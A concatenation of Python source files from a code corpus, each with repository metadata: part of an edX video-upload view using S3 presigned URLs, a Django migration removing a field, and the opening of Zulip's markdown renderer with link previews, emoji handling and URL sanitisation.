    # Course-level lookups hoisted out of the per-file loop; they do not
    # depend on the individual file being processed.
    # Only include `course_video_upload_token` if its set, as it won't be required if video uploads
    # are enabled by default.
    course_video_upload_token = course.video_upload_pipeline.get('course_video_upload_token')
    is_video_transcript_enabled = VideoTranscriptEnabledFlag.feature_enabled(course.id)
    transcript_preferences = (
        get_transcript_preferences(unicode(course.id)) if is_video_transcript_enabled else None
    )

    for req_file in req_files:
        file_name = req_file['file_name']

        # S3 metadata values must be ASCII; reject other names up front
        try:
            file_name.encode('ascii')
        except UnicodeEncodeError:
            error_msg = 'The file name for %s must contain only ASCII characters.' % file_name
            return JsonResponse({'error': error_msg}, status=400)

        edx_video_id = unicode(uuid4())
        key = storage_service_key(bucket, file_name=edx_video_id)

        metadata_list = [
            ('client_video_id', file_name),
            ('course_key', unicode(course.id)),
        ]
        if course_video_upload_token:
            metadata_list.append(('course_video_upload_token', course_video_upload_token))
        if transcript_preferences is not None:
            metadata_list.append(('transcript_preferences', json.dumps(transcript_preferences)))
        for metadata_name, value in metadata_list:
            key.set_metadata(metadata_name, value)

        # One-time, expiring PUT URL the client uploads the raw file to
        upload_url = key.generate_url(
            KEY_EXPIRATION_IN_SECONDS,
            'PUT',
            headers={'Content-Type': req_file['content_type']}
        )

        # persist edx_video_id in VAL
        create_video({
            'edx_video_id': edx_video_id,
            'status': 'upload',
            'client_video_id': file_name,
            'duration': 0,
            'encoded_videos': [],
            'courses': [unicode(course.id)]
        })

        resp_files.append({'file_name': file_name, 'upload_url': upload_url, 'edx_video_id': edx_video_id})

    return JsonResponse({'files': resp_files}, status=200)
def storage_service_bucket():
    """
    Return the S3 bucket configured for video uploads.
    """
    connection = s3.connection.S3Connection(
        settings.AWS_ACCESS_KEY_ID,
        settings.AWS_SECRET_ACCESS_KEY
    )
    # Skip bucket validation: boto's validation fires a HEAD request that is
    # equivalent to get_all_keys(), requiring ListObjects on the whole bucket
    # rather than just the path each environment uses (several deployments
    # may share a single bucket), which is far too permissive an IAM ask.
    return connection.get_bucket(settings.VIDEO_UPLOAD_PIPELINE["BUCKET"], validate=False)
def storage_service_key(bucket, file_name):
    """
    Return an S3 key for ``file_name`` inside ``bucket``.

    The key lives under the upload pipeline's configured ROOT_PATH.
    """
    root_path = settings.VIDEO_UPLOAD_PIPELINE.get("ROOT_PATH", "")
    key_name = "{}/{}".format(root_path, file_name)
    return s3.key.Key(bucket, key_name)
def send_video_status_update(updates):
    """
    Push a batch of video status updates to edx-val, logging each one.
    """
    for update in updates:
        video_id = update.get('edxVideoId')
        status = update.get('status')
        update_video_status(video_id, status)
        LOGGER.info(
            'VIDEOS: Video status update with id [%s], status [%s] and message [%s]',
            video_id,
            status,
            update.get('message')
        )

    return JsonResponse()
def is_status_update_request(request_data):
    """
    Return True when any entry in ``request_data`` carries a 'status' key.
    """
    for update in request_data:
        if 'status' in update:
            return True
    return False
|
hastexo/edx-platform
|
cms/djangoapps/contentstore/views/videos.py
|
Python
|
agpl-3.0
| 32,559
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.7 on 2017-10-26 20:17
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    # Auto-generated migration: drops the unused `is_active` flag from the
    # Dossier model.

    dependencies = [
        ('document', '0049_document_types'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='dossier',
            name='is_active',
        ),
    ]
|
openkamer/openkamer
|
document/migrations/0050_remove_dossier_is_active.py
|
Python
|
mit
| 394
|
from __future__ import absolute_import
# Zulip's main markdown implementation. See docs/markdown.md for
# detailed documentation on our markdown syntax.
from typing import Any, Callable, Dict, Iterable, List, Optional, Tuple, TypeVar, Union, Text
from typing.re import Match
import markdown
import logging
import traceback
from six.moves import urllib
import re
import os.path
import glob
import twitter
import platform
import time
import httplib2
import itertools
from six.moves import urllib
import xml.etree.cElementTree as etree
from xml.etree.cElementTree import Element, SubElement
from collections import defaultdict
import requests
from django.core import mail
from django.conf import settings
from zerver.lib.avatar_hash import gravatar_hash
from markdown.extensions import codehilite
from zerver.lib.bugdown import fenced_code
from zerver.lib.bugdown.fenced_code import FENCE_RE
from zerver.lib.camo import get_camo_url
from zerver.lib.timeout import timeout, TimeoutExpired
from zerver.lib.cache import cache_with_key, cache_get_many, cache_set_many
from zerver.models import Message
import zerver.lib.alert_words as alert_words
import zerver.lib.mention as mention
from zerver.lib.str_utils import force_text, force_str
import six
from six.moves import range, html_parser
from six import text_type
# `html.unescape` only exists on Python 3; Python 2 falls back to
# HTMLParser (see `unescape` further down in this file).
if six.PY3:
    import html

# Format version of the bugdown rendering; stored along with rendered
# messages so that we can efficiently determine what needs to be re-rendered
version = 1

# Generic result type used to type `walk_tree`'s processor callback.
_T = TypeVar('_T')

# We need to avoid this running at runtime, but mypy will see this.
# The problem is that under python 2, Element isn't exactly a type,
# which means that at runtime Union causes this to blow up.
if False:
    # mypy requires the Optional to be inside Union
    ElementStringNone = Union[Element, Optional[text_type]]
class BugdownRenderingException(Exception):
    """Signals a failure while rendering a message's markdown (bugdown)."""
    pass
def unescape(s):
    # type: (Text) -> (Text)
    """Convert HTML entities in ``s`` back into literal characters."""
    if not six.PY2:
        return html.unescape(s)
    return html_parser.HTMLParser().unescape(s)
def list_of_tlds():
    # type: () -> List[Text]
    """Return all IANA TLDs (longest first), for URL auto-detection.

    Reads the tlds-alpha-by-domain.txt data file (from
    http://data.iana.org/TLD/tlds-alpha-by-domain.txt) shipped alongside
    this module.  Sorted longest-first so that regex alternation prefers
    the most specific match.
    """
    # HACK we manually blacklist .py, so that Python filenames in chat are
    # not linkified.  Entries keep their trailing newline because we compare
    # against the raw file lines below.
    blacklist = [u'PY\n', ]
    tlds_file = os.path.join(os.path.dirname(__file__), 'tlds-alpha-by-domain.txt')
    # Use a context manager so the file handle is closed promptly; the
    # original version left the open file to the garbage collector.
    with open(tlds_file, 'r') as f:
        # Skip the leading '#' comment line(s) in the data file.
        tlds = [force_text(tld).lower().strip() for tld in f
                if tld not in blacklist and not tld.startswith('#')]
    tlds.sort(key=len, reverse=True)
    return tlds
def walk_tree(root, processor, stop_after_first=False):
    # type: (Element, Callable[[Element], Optional[_T]], bool) -> List[_T]
    """Walk the element tree under ``root`` (``root`` itself excluded),
    collecting the non-None results of ``processor`` for each element.

    If ``stop_after_first`` is set, return as soon as one result is found.
    """
    results = []
    stack = [root]

    while stack:
        current = stack.pop()
        # Iterate the element directly instead of calling the deprecated
        # Element.getchildren(), which was removed in Python 3.9.
        for child in current:
            if len(child):
                # Child has children of its own; descend into it later.
                stack.append(child)
            result = processor(child)
            if result is not None:
                results.append(result)
                if stop_after_first:
                    return results

    return results
# height is not actually used
def add_a(root, url, link, height="", title=None, desc=None,
          class_attr="message_inline_image", data_id=None):
    # type: (Element, Text, Text, Text, Optional[Text], Optional[Text], Text, Optional[Text]) -> None
    """Append an inline image preview (<div><a><img/></a></div>) to ``root``."""
    if title is None:
        title = url_filename(link)
    if not title:
        title = ""
    if desc is None:
        desc = ""
    container = markdown.util.etree.SubElement(root, "div")
    container.set("class", class_attr)
    anchor = markdown.util.etree.SubElement(container, "a")
    anchor.set("href", link)
    anchor.set("target", "_blank")
    anchor.set("title", title)
    if data_id is not None:
        anchor.set("data-id", data_id)
    image = markdown.util.etree.SubElement(anchor, "img")
    image.set("src", url)
    if class_attr == "message_inline_ref":
        # Dropbox-style reference previews also carry a title/description.
        summary = markdown.util.etree.SubElement(container, "div")
        title_elem = markdown.util.etree.SubElement(summary, "div")
        title_elem.set("class", "message_inline_image_title")
        title_elem.text = title
        desc_elem = markdown.util.etree.SubElement(summary, "desc")
        desc_elem.set("class", "message_inline_image_desc")
@cache_with_key(lambda tweet_id: tweet_id, cache_name="database", with_statsd_key="tweet_data")
def fetch_tweet_data(tweet_id):
    # type: (Text) -> Optional[Dict[Text, Any]]
    # Fetch tweet `tweet_id` via the Twitter API (results cached in the
    # database by the decorator).  Returns None for permanent failures (so
    # the miss gets cached) and re-raises transient errors (so nothing is
    # cached and we retry later).
    if settings.TEST_SUITE:
        from . import testing_mocks
        res = testing_mocks.twitter(tweet_id)
    else:
        creds = {
            'consumer_key': settings.TWITTER_CONSUMER_KEY,
            'consumer_secret': settings.TWITTER_CONSUMER_SECRET,
            'access_token_key': settings.TWITTER_ACCESS_TOKEN_KEY,
            'access_token_secret': settings.TWITTER_ACCESS_TOKEN_SECRET,
        }
        # Twitter API credentials not (fully) configured: no preview.
        if not all(creds.values()):
            return None
        try:
            api = twitter.Api(**creds)
            # Sometimes Twitter hangs on responses. Timing out here
            # will cause the Tweet to go through as-is with no inline
            # preview, rather than having the message be rejected
            # entirely. This timeout needs to be less than our overall
            # formatting timeout.
            tweet = timeout(3, api.GetStatus, tweet_id)
            res = tweet.AsDict()
        except AttributeError:
            logging.error('Unable to load twitter api, you may have the wrong '
                          'library installed, see https://github.com/zulip/zulip/issues/86')
            return None
        except TimeoutExpired as e:
            # We'd like to try again later and not cache the bad result,
            # so we need to re-raise the exception (just as though
            # we were being rate-limited)
            raise
        except twitter.TwitterError as e:
            t = e.args[0]
            if len(t) == 1 and ('code' in t[0]) and (t[0]['code'] == 34):
                # Code 34 means that the message doesn't exist; return
                # None so that we will cache the error
                return None
            elif len(t) == 1 and ('code' in t[0]) and (t[0]['code'] == 88 or
                                                       t[0]['code'] == 130):
                # Code 88 means that we were rate-limited and 130
                # means Twitter is having capacity issues; either way
                # just raise the error so we don't cache None and will
                # try again later.
                raise
            else:
                # It's not clear what to do in cases of other errors,
                # but for now it seems reasonable to log at error
                # level (so that we get notified), but then cache the
                # failure to proceed with our usual work
                logging.error(traceback.format_exc())
                return None
    return res
# Matchers for the pieces of an HTML document that fetch_open_graph_image
# cares about; they are applied to the fragments produced by splitting the
# raw HTML on '<'.
HEAD_START_RE = re.compile(u'^head[ >]')
HEAD_END_RE = re.compile(u'^/head[ >]')
META_START_RE = re.compile(u'^meta[ >]')
META_END_RE = re.compile(u'^/meta[ >]')
def fetch_open_graph_image(url):
    # type: (Text) -> Optional[Dict[str, Any]]
    """Fetch ``url`` and scrape its Open Graph metadata.

    Returns {'image', 'title', 'desc'} ('title'/'desc' may be None), or
    None when the page cannot be fetched/parsed or carries no og:image.
    """
    in_head = False
    # HTML will auto close meta tags, when we start the next tag add a closing tag if it has not been closed yet.
    last_closed = True
    head = []
    # TODO: What if response content is huge? Should we get headers first?
    try:
        content = requests.get(url, timeout=1).text
    except Exception:
        # Was a bare `except:`, which would also swallow SystemExit and
        # KeyboardInterrupt; any fetch failure just means "no preview".
        return None
    # Extract the head and meta tags
    # All meta tags are self closing, have no children or are closed
    # automatically.
    for part in content.split('<'):
        if not in_head and HEAD_START_RE.match(part):
            # Started the head node output it to have a document root
            in_head = True
            head.append('<head>')
        elif in_head and HEAD_END_RE.match(part):
            # Found the end of the head close any remaining tag then stop
            # processing
            in_head = False
            if not last_closed:
                last_closed = True
                head.append('</meta>')
            head.append('</head>')
            break
        elif in_head and META_START_RE.match(part):
            # Found a meta node copy it
            if not last_closed:
                head.append('</meta>')
                last_closed = True
            head.append('<')
            head.append(part)
            if '/>' not in part:
                last_closed = False
        elif in_head and META_END_RE.match(part):
            # End of a meta node just copy it to close the tag
            head.append('<')
            head.append(part)
            last_closed = True
    try:
        doc = etree.fromstring(''.join(head))
    except etree.ParseError:
        return None
    og_image = doc.find('meta[@property="og:image"]')
    og_title = doc.find('meta[@property="og:title"]')
    og_desc = doc.find('meta[@property="og:description"]')
    title = None
    desc = None
    if og_image is not None:
        image = og_image.get('content')
    else:
        # Without og:image there is nothing worth previewing.
        return None
    if og_title is not None:
        title = og_title.get('content')
    if og_desc is not None:
        desc = og_desc.get('content')
    return {'image': image, 'title': title, 'desc': desc}
def get_tweet_id(url):
    # type: (Text) -> Optional[Text]
    """Return the tweet ID from a twitter.com URL, or None for anything else."""
    parsed = urllib.parse.urlparse(url)
    on_twitter = (parsed.netloc == 'twitter.com' or
                  parsed.netloc.endswith('.twitter.com'))
    if not on_twitter:
        return None
    # Old-style twitter.com/#!/wdaher/status/1231241234 URLs keep the
    # interesting part in the fragment rather than the path.
    if parsed.path == '/' and len(parsed.fragment) > 5:
        candidate = parsed.fragment
    else:
        candidate = parsed.path
    match = re.match(r'^!?/.*?/status(es)?/(?P<tweetid>\d{10,18})(/photo/[0-9])?/?$', candidate)
    if match is None:
        return None
    return match.group("tweetid")
class InlineHttpsProcessor(markdown.treeprocessors.Treeprocessor):
    """Rewrites http:// image sources to go through the camo proxy."""

    def run(self, root):
        # type: (Element) -> None
        # Collect every <img> element in the rendered tree.
        images = walk_tree(root, lambda elem: elem if elem.tag == "img" else None)
        for image in images:
            src = image.get("src")
            if src.startswith("http://"):
                image.set("src", get_camo_url(src))
            # Everything else (https, relative URLs such as our own
            # emoji) is left untouched.
class InlineInterestingLinkProcessor(markdown.treeprocessors.Treeprocessor):
    # Tree processor that appends inline previews (Dropbox, plain images,
    # tweets, YouTube thumbnails) to messages that link to such content.

    # Pick the largest Twitter image strictly below this height (px).
    TWITTER_MAX_IMAGE_HEIGHT = 400
    # Cap on the number of tweet previews rendered per message.
    TWITTER_MAX_TO_PREVIEW = 3

    def __init__(self, md, bugdown):
        # type: (markdown.Markdown, Bugdown) -> None
        # Passing in bugdown for access to config to check if realm is zulip.com
        self.bugdown = bugdown
        markdown.treeprocessors.Treeprocessor.__init__(self, md)

    def is_image(self, url):
        # type: (Text) -> bool
        # True when the URL's path ends in a known image extension.
        if not settings.INLINE_IMAGE_PREVIEW:
            return False
        parsed_url = urllib.parse.urlparse(url)
        # List from http://support.google.com/chromeos/bin/answer.py?hl=en&answer=183093
        # NOTE(review): "jpeg" has no leading dot, so e.g. "foo.xjpeg" also
        # matches; presumably intended to be ".jpeg" — confirm upstream.
        for ext in [".bmp", ".gif", ".jpg", "jpeg", ".png", ".webp"]:
            if parsed_url.path.lower().endswith(ext):
                return True
        return False

    def dropbox_image(self, url):
        # type: (Text) -> Optional[Dict]
        # TODO: specify details of returned Dict
        parsed_url = urllib.parse.urlparse(url)
        if (parsed_url.netloc == 'dropbox.com' or parsed_url.netloc.endswith('.dropbox.com')):
            is_album = parsed_url.path.startswith('/sc/') or parsed_url.path.startswith('/photos/')
            # Only allow preview Dropbox shared links
            if not (parsed_url.path.startswith('/s/') or
                    parsed_url.path.startswith('/sh/') or
                    is_album):
                return None

            # Try to retrieve open graph protocol info for a preview
            # This might be redundant right now for shared links for images.
            # However, we might want to make use of title and description
            # in the future. If the actual image is too big, we might also
            # want to use the open graph image.
            image_info = fetch_open_graph_image(url)

            is_image = is_album or self.is_image(url)

            # If it is from an album or not an actual image file,
            # just use open graph image.
            if is_album or not is_image:
                # Failed to follow link to find an image preview so
                # use placeholder image and guess filename
                if image_info is None:
                    return None

                image_info["is_image"] = is_image
                return image_info

            # Otherwise, try to retrieve the actual image.
            # This is because open graph image from Dropbox may have padding
            # and gifs do not work.
            # TODO: What if image is huge? Should we get headers first?
            if image_info is None:
                image_info = dict()
            image_info['is_image'] = True
            parsed_url_list = list(parsed_url)
            parsed_url_list[4] = "dl=1"  # Replaces query
            image_info["image"] = urllib.parse.urlunparse(parsed_url_list)

            return image_info
        return None

    def youtube_id(self, url):
        # type: (Text) -> Optional[Text]
        if not settings.INLINE_IMAGE_PREVIEW:
            return None
        # Youtube video id extraction regular expression from http://pastebin.com/KyKAFv1s
        # If it matches, match.group(2) is the video id.
        youtube_re = r'^((?:https?://)?(?:youtu\.be/|(?:\w+\.)?youtube(?:-nocookie)?\.com/)' + \
            r'(?:(?:(?:v|embed)/)|(?:(?:watch(?:_popup)?(?:\.php)?)?(?:\?|#!?)(?:.+&)?v=)))' + \
            r'?([0-9A-Za-z_-]+)(?(1).+)?$'
        match = re.match(youtube_re, url)
        if match is None:
            return None
        return match.group(2)

    def youtube_image(self, url):
        # type: (Text) -> Optional[Text]
        # Thumbnail URL for a YouTube link; implicitly returns None for
        # non-YouTube URLs (no explicit fall-through return).
        yt_id = self.youtube_id(url)

        if yt_id is not None:
            return "https://i.ytimg.com/vi/%s/default.jpg" % (yt_id,)

    def twitter_text(self, text, urls, user_mentions, media):
        # type: (Text, List[Dict[Text, Text]], List[Dict[Text, Any]], List[Dict[Text, Any]]) -> Element
        """
        Use data from the twitter API to turn links, mentions and media into A
        tags.

        This works by using the urls, user_mentions and media data from the
        twitter API.

        The first step is finding the locations of the URLs, mentions and media
        in the text. For each match we build a dictionary with the start
        location, end location, the URL to link to, and the text to show in the
        link.

        Next we sort the matches by start location. And for each we add the
        text from the end of the last link to the start of the current link to
        the output. The text needs to added to the text attribute of the first
        node (the P tag) or the tail the last link created.

        Finally we add any remaining text to the last node.
        """
        to_linkify = []  # type: List[Dict[Text, Any]]
        # Build dicts for URLs
        for url_data in urls:
            short_url = url_data["url"]
            full_url = url_data["expanded_url"]
            for match in re.finditer(re.escape(short_url), text, re.IGNORECASE):
                to_linkify.append({
                    'start': match.start(),
                    'end': match.end(),
                    'url': short_url,
                    'text': full_url,
                })
        # Build dicts for mentions
        for user_mention in user_mentions:
            screen_name = user_mention['screen_name']
            mention_string = u'@' + screen_name
            for match in re.finditer(re.escape(mention_string), text, re.IGNORECASE):
                to_linkify.append({
                    'start': match.start(),
                    'end': match.end(),
                    'url': u'https://twitter.com/' + force_text(urllib.parse.quote(force_str(screen_name))),
                    'text': mention_string,
                })
        # Build dicts for media
        for media_item in media:
            short_url = media_item['url']
            expanded_url = media_item['expanded_url']
            for match in re.finditer(re.escape(short_url), text, re.IGNORECASE):
                to_linkify.append({
                    'start': match.start(),
                    'end': match.end(),
                    'url': short_url,
                    'text': expanded_url,
                })

        to_linkify.sort(key=lambda x: x['start'])
        p = current_node = markdown.util.etree.Element('p')

        def set_text(text):
            # type: (Text) -> None
            """
            Helper to set the text or the tail of the current_node
            """
            if current_node == p:
                current_node.text = text
            else:
                current_node.tail = text

        current_index = 0
        for link in to_linkify:
            # The text we want to link starts in already linked text skip it
            if link['start'] < current_index:
                continue
            # Add text from the end of last link to the start of the current
            # link
            set_text(text[current_index:link['start']])
            current_index = link['end']
            current_node = a = url_to_a(link['url'], link['text'])
            p.append(a)

        # Add any unused text
        set_text(text[current_index:])
        return p

    def twitter_link(self, url):
        # type: (Text) -> Optional[Element]
        # Build a full tweet preview element (avatar, linkified text,
        # attribution, photo previews), or None if the URL is not a tweet
        # or fetching it fails.
        tweet_id = get_tweet_id(url)

        if tweet_id is None:
            return None

        try:
            res = fetch_tweet_data(tweet_id)
            if res is None:
                return None
            user = res['user']  # type: Dict[Text, Any]
            tweet = markdown.util.etree.Element("div")
            tweet.set("class", "twitter-tweet")
            img_a = markdown.util.etree.SubElement(tweet, 'a')
            img_a.set("href", url)
            img_a.set("target", "_blank")
            profile_img = markdown.util.etree.SubElement(img_a, 'img')
            profile_img.set('class', 'twitter-avatar')
            # For some reason, for, e.g. tweet 285072525413724161,
            # python-twitter does not give us a
            # profile_image_url_https, but instead puts that URL in
            # profile_image_url. So use _https if available, but fall
            # back gracefully.
            image_url = user.get('profile_image_url_https', user['profile_image_url'])
            profile_img.set('src', image_url)

            text = unescape(res['text'])
            urls = res.get('urls', [])
            user_mentions = res.get('user_mentions', [])
            media = res.get('media', [])  # type: List[Dict[Text, Any]]
            p = self.twitter_text(text, urls, user_mentions, media)
            tweet.append(p)

            span = markdown.util.etree.SubElement(tweet, 'span')
            span.text = u"- %s (@%s)" % (user['name'], user['screen_name'])

            # Add image previews
            for media_item in media:
                # Only photos have a preview image
                if media_item['type'] != 'photo':
                    continue

                # Find the image size that is smaller than
                # TWITTER_MAX_IMAGE_HEIGHT px tall or the smallest
                size_name_tuples = list(media_item['sizes'].items())
                size_name_tuples.sort(reverse=True,
                                      key=lambda x: x[1]['h'])
                for size_name, size in size_name_tuples:
                    if size['h'] < self.TWITTER_MAX_IMAGE_HEIGHT:
                        break

                media_url = u'%s:%s' % (media_item['media_url_https'], size_name)
                img_div = markdown.util.etree.SubElement(tweet, 'div')
                img_div.set('class', 'twitter-image')
                img_a = markdown.util.etree.SubElement(img_div, 'a')
                img_a.set('href', media_item['url'])
                img_a.set('target', '_blank')
                img_a.set('title', media_item['url'])
                img = markdown.util.etree.SubElement(img_a, 'img')
                img.set('src', media_url)

            return tweet
        except:
            # We put this in its own try-except because it requires external
            # connectivity. If Twitter flakes out, we don't want to not-render
            # the entire message; we just want to not show the Twitter preview.
            logging.warning(traceback.format_exc())
            return None

    def get_url_data(self, e):
        # type: (Element) -> Optional[Tuple[Text, Text]]
        # For an <a> element, return (href, link text) — falling back to
        # the href itself when the link has no text.
        if e.tag == "a":
            if e.text is not None:
                return (e.get("href"), force_text(e.text))
            return (e.get("href"), e.get("href"))
        return None

    def run(self, root):
        # type: (Element) -> None
        # Get all URLs from the blob
        found_urls = walk_tree(root, self.get_url_data)

        # If there are more than 5 URLs in the message, don't do inline previews
        if len(found_urls) == 0 or len(found_urls) > 5:
            return

        rendered_tweet_count = 0

        for (url, text) in found_urls:
            dropbox_image = self.dropbox_image(url)
            if dropbox_image is not None:
                class_attr = "message_inline_ref"
                is_image = dropbox_image["is_image"]
                if is_image:
                    class_attr = "message_inline_image"
                    # Not making use of title and description of images
                add_a(root, dropbox_image['image'], url,
                      title=dropbox_image.get('title', ""),
                      desc=dropbox_image.get('desc', ""),
                      class_attr=class_attr)
                continue
            if self.is_image(url):
                add_a(root, url, url, title=text)
                continue
            if get_tweet_id(url) is not None:
                # Render at most TWITTER_MAX_TO_PREVIEW tweet previews
                # per message.
                if rendered_tweet_count >= self.TWITTER_MAX_TO_PREVIEW:
                    continue
                twitter_data = self.twitter_link(url)
                if twitter_data is None:
                    # This link is not actually a tweet known to twitter
                    continue
                rendered_tweet_count += 1
                div = markdown.util.etree.SubElement(root, "div")
                div.set("class", "inline-preview-twitter")
                div.insert(0, twitter_data)
                continue
            youtube = self.youtube_image(url)
            if youtube is not None:
                yt_id = self.youtube_id(url)
                add_a(root, youtube, url, None, None, None, "youtube-video message_inline_image", yt_id)
                continue
class Avatar(markdown.inlinepatterns.Pattern):
    """Renders avatar syntax as a gravatar <img> for the matched email."""

    def handleMatch(self, match):
        # type: (Match[Text]) -> Optional[Element]
        email = match.group('email')
        img = markdown.util.etree.Element('img')
        img.set('class', 'message_body_gravatar')
        img.set('src', '/avatar/%s?s=30' % (email,))
        img.set('title', email)
        img.set('alt', email)
        return img
# Enumerate the emoji shipped in the static assets: named emoji live
# directly under the gemoji images directory, unicode codepoint emoji
# (named by hex codepoint) under its `unicode` subdirectory.
emoji_tree = os.path.join(settings.STATIC_ROOT, "third", "gemoji", "images", "emoji")
path_to_emoji = os.path.join(emoji_tree, '*.png')
path_to_unicode_emoji = os.path.join(emoji_tree, 'unicode', '*.png')

emoji_list = [os.path.splitext(os.path.basename(fn))[0] for fn in glob.glob(path_to_emoji)]
unicode_emoji_list = [os.path.splitext(os.path.basename(fn))[0] for fn in glob.glob(path_to_unicode_emoji)]
def make_emoji(emoji_name, src, display_string):
    # type: (Text, Text, Text) -> Element
    """Build an <img class="emoji"> element for the given emoji image."""
    img = markdown.util.etree.Element('img')
    img.set('src', src)
    img.set('class', 'emoji')
    img.set("alt", display_string)
    img.set("title", display_string)
    return img
class UnicodeEmoji(markdown.inlinepatterns.Pattern):
    """Replaces a literal unicode emoji character with its image, when known."""

    def handleMatch(self, match):
        # type: (Match[Text]) -> Optional[Element]
        orig_syntax = match.group('syntax')
        # Unicode emoji images are named by the lowercase hex codepoint.
        codepoint = hex(ord(orig_syntax))[2:]
        if codepoint not in unicode_emoji_list:
            return None
        src = '/static/third/gemoji/images/emoji/unicode/%s.png' % (codepoint)
        return make_emoji(codepoint, src, orig_syntax)
class Emoji(markdown.inlinepatterns.Pattern):
    # Renders :emoji_name: syntax, preferring realm (custom) emoji over
    # the built-in set.
    def handleMatch(self, match):
        # type: (Match[Text]) -> Optional[Element]
        orig_syntax = match.group("syntax")
        # Strip the surrounding colons from :emoji_name:.
        name = orig_syntax[1:-1]

        # NOTE(review): `db_data` and `current_message` are module globals
        # set up per-render elsewhere in this file.
        realm_emoji = {}  # type: Dict[Text, Dict[str, Text]]
        if db_data is not None:
            realm_emoji = db_data['emoji']

        if current_message and name in realm_emoji:
            return make_emoji(name, realm_emoji[name]['display_url'], orig_syntax)
        elif name in emoji_list:
            src = '/static/third/gemoji/images/emoji/%s.png' % (name)
            return make_emoji(name, src, orig_syntax)
        else:
            return None
class StreamSubscribeButton(markdown.inlinepatterns.Pattern):
    """Renders an inline "Subscribe to <stream>" button.

    The matching javascript behavior lives in static/js/custom_markdown.js.
    """

    def handleMatch(self, match):
        # type: (Match[Text]) -> Element
        # Undo the escaping the inline syntax required for ')' and '\'.
        stream_name = match.group('stream_name')
        stream_name = stream_name.replace('\\)', ')').replace('\\\\', '\\')

        span = markdown.util.etree.Element('span')
        span.set('class', 'inline-subscribe')
        span.set('data-stream-name', stream_name)

        button = markdown.util.etree.SubElement(span, 'button')
        button.set('class', 'inline-subscribe-button btn')
        button.text = 'Subscribe to ' + stream_name

        error_span = markdown.util.etree.SubElement(span, 'span')
        error_span.set('class', 'inline-subscribe-error')
        return span
class ModalLink(markdown.inlinepatterns.Pattern):
    """
    A pattern that allows including in-app modal links in messages.
    """

    def handleMatch(self, match):
        # type: (Match[Text]) -> Element
        target = match.group('relative_url')
        label = match.group('text')

        link = markdown.util.etree.Element("a")
        link.set("href", target)
        link.set("title", target)
        # data-toggle=modal makes the web client open this link in a modal.
        link.set("data-toggle", "modal")
        link.text = label
        return link
# Matches URLs pointing at files in user_uploads, capturing the original
# filename as the final path component.
upload_title_re = re.compile(u"^(https?://[^/]*)?(/user_uploads/\\d+)(/[^/]*)?/[^/]*/(?P<filename>[^/]*)$")

def url_filename(url):
    # type: (Text) -> Text
    """Extract the filename if a URL is an uploaded file, or return the original URL"""
    match = upload_title_re.match(url)
    if match is None:
        return url
    return match.group('filename')
def fixup_link(link, target_blank=True):
    # type: (markdown.util.etree.Element, bool) -> None
    """Set certain attributes we want on every link."""
    # Title shows the uploaded file's original name where applicable.
    link.set('title', url_filename(link.get('href')))
    if target_blank:
        link.set('target', '_blank')
def sanitize_url(url):
    # type: (Text) -> Text
    """
    Sanitize a url against xss attacks.
    See the docstring on markdown.inlinepatterns.LinkPattern.sanitize_url.

    NOTE(review): despite the type comment, this returns None for URLs it
    rejects outright (bad scheme, missing netloc); callers must handle that.
    """
    try:
        parts = urllib.parse.urlparse(url.replace(' ', '%20'))
        scheme, netloc, path, params, query, fragment = parts
    except ValueError:
        # Bad url - so bad it couldn't be parsed.
        return ''

    # If there is no scheme or netloc and there is a '@' in the path,
    # treat it as a mailto: and set the appropriate scheme
    if scheme == '' and netloc == '' and '@' in path:
        scheme = 'mailto'
    elif scheme == '' and netloc == '' and len(path) > 0 and path[0] == '/':
        # Allow domain-relative links
        return urllib.parse.urlunparse(('', '', path, params, query, fragment))
    elif (scheme, netloc, path, params, query) == ('', '', '', '', '') and len(fragment) > 0:
        # Allow fragment links
        return urllib.parse.urlunparse(('', '', '', '', '', fragment))

    # Zulip modification: If scheme is not specified, assume http://
    # We re-enter sanitize_url because netloc etc. need to be re-parsed.
    if not scheme:
        return sanitize_url('http://' + url)

    locless_schemes = ['mailto', 'news', 'file']
    if netloc == '' and scheme not in locless_schemes:
        # This fails regardless of anything else.
        # Return immediately to save additional proccessing
        return None

    # Upstream code will accept a URL like javascript://foo because it
    # appears to have a netloc.  Additionally there are plenty of other
    # schemes that do weird things like launch external programs.  To be
    # on the safe side, we whitelist the scheme.
    if scheme not in ('http', 'https', 'ftp', 'mailto', 'file'):
        return None

    # Upstream code scans path, parameters, and query for colon characters
    # because
    #
    #    some aliases [for javascript:] will appear to urllib.parse to have
    #    no scheme. On top of that relative links (i.e.: "foo/bar.html")
    #    have no scheme.
    #
    # We already converted an empty scheme to http:// above, so we skip
    # the colon check, which would also forbid a lot of legitimate URLs.

    # Url passes all tests. Return url as-is.
    return urllib.parse.urlunparse((scheme, netloc, path, params, query, fragment))
def url_to_a(url, text=None):
    # type: (Text, Optional[Text]) -> Union[Element, Text]
    """Turn ``url`` into an <a> element, or return the raw URL text if it
    fails sanitization."""
    href = sanitize_url(url)
    if href is None:
        # Rejected by sanitize_url; render it as plain text.
        return url

    anchor = markdown.util.etree.Element('a')
    anchor.set('href', href)
    if text is None:
        # AtomicString keeps other inline patterns from re-processing
        # the URL text.
        text = markdown.util.AtomicString(url)
    anchor.text = text
    # mailto: links should not open a new tab.
    fixup_link(anchor, 'mailto:' not in href[:7])
    return anchor
class VerbosePattern(markdown.inlinepatterns.Pattern):
    # Base class for inline patterns whose regexes need the DOTALL and
    # VERBOSE flags, which python-markdown's Pattern.__init__ does not apply.
    def __init__(self, pattern):
        # type: (Text) -> None
        markdown.inlinepatterns.Pattern.__init__(self, ' ')

        # HACK: we just had python-markdown compile an empty regex.
        # Now replace with the real regex compiled with the flags we want.
        self.pattern = pattern
        self.compiled_re = re.compile(u"^(.*?)%s(.*?)$" % pattern,
                                      re.DOTALL | re.UNICODE | re.VERBOSE)
class AutoLink(VerbosePattern):
    # Converts bare URLs in message text into <a> links (or leaves them as
    # plain text if url_to_a rejects them).
    def handleMatch(self, match):
        # type: (Match[Text]) -> ElementStringNone
        url = match.group('url')
        return url_to_a(url)
class UListProcessor(markdown.blockprocessors.UListProcessor):
    """ Process unordered list blocks.

        Based on markdown.blockprocessors.UListProcessor, but does not accept
        '+' or '-' as a bullet character."""

    TAG = 'ul'
    # Up to three leading spaces, a '*' bullet, then at least one space.
    RE = re.compile(u'^[ ]{0,3}[*][ ]+(.*)')
class BugdownUListPreprocessor(markdown.preprocessors.Preprocessor):
    """ Allows unordered list blocks that come directly after a
